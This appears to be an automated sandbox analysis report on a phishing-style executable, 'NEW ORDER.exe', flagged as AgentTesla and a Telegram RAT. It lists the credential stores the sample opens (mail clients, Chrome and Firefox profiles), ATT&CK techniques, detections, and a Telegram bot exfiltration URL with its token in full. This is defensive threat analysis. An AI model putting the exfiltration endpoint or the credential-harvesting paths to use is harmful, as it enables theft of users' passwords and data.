                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Users\user\Desktop\NEW ORDER.exe VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.501750120.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\Desktop\NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: Yara matchFile source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.501750120.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts211
                  Windows Management Instrumentation                  		1
                  Scheduled Task/Job                  		111
                  Process Injection                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		Exfiltration Over Other Network Medium1
                  Web Service                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts2
                  Command and Scripting Interpreter                  		Boot or Logon Initialization Scripts1
                  Scheduled Task/Job                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		114
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		Exfiltration Over Bluetooth11
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts1
                  Scheduled Task/Job                  		Logon Script (Windows)Logon Script (Windows)2
                  Obfuscated Files or Information                  		Security Account Manager211
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		Automated Exfiltration2
                  Non-Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model21
                  Input Capture                  		Scheduled Transfer3
                  Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Masquerading                  		LSA Secrets131
                  Virtualization/Sandbox Evasion                  		SSH1
                  Clipboard Data                  		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common131
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                  Process Injection                  		DCSync1
                  Remote System Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  NEW ORDER.exe49%VirustotalBrowse
                  NEW ORDER.exe100%AviraHEUR/AGEN.1235429
                  NEW ORDER.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\HvabCK.exe100%AviraHEUR/AGEN.1235429
                  C:\Users\user\AppData\Roaming\HvabCK.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  7.0.NEW ORDER.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                  0.0.NEW ORDER.exe.960000.0.unpack100%AviraHEUR/AGEN.1235429Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  https://api.ipify.org%%startupfolder%0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.founder.com.cn/cnF0%URL Reputationsafe
                  http://www.carterandcone.comothf0%Avira URL Cloudsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  https://api.telegram.org40%URL Reputationsafe
                  http://www.carterandcone.comCu0%Avira URL Cloudsafe
                  http://www.fonts.comnK0%Avira URL Cloudsafe
                  http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sajatypeworks.comb0%Avira URL Cloudsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.sajatypeworks.comeG0%Avira URL Cloudsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  https://api.ipify.org%0%URL Reputationsafe
                  http://www.galapagosdesign.com/L0%Avira URL Cloudsafe
                  http://www.carterandcone.comd0%URL Reputationsafe
                  http://www.founder.com.cn/cnGZ0%Avira URL Cloudsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                  http://www.carterandcone.comh0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.founder.com.cn/cn/0%URL Reputationsafe
                  http://www.founder.com.cn/cn.0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.fontbureau.comoitu0%URL Reputationsafe
                  http://www.monotype.0%URL Reputationsafe
                  http://www.fontbureau.comt0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.fontbureau.comce0%URL Reputationsafe
                  http://gesqcS.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocumentfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://www.fontbureau.com/designersGNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designers/?NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.orgNEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocumentdocument-----NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers?NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.tiro.comNEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersNEW ORDER.exe, 00000000.00000003.238918778.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.ipify.org%%startupfolder%NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		low
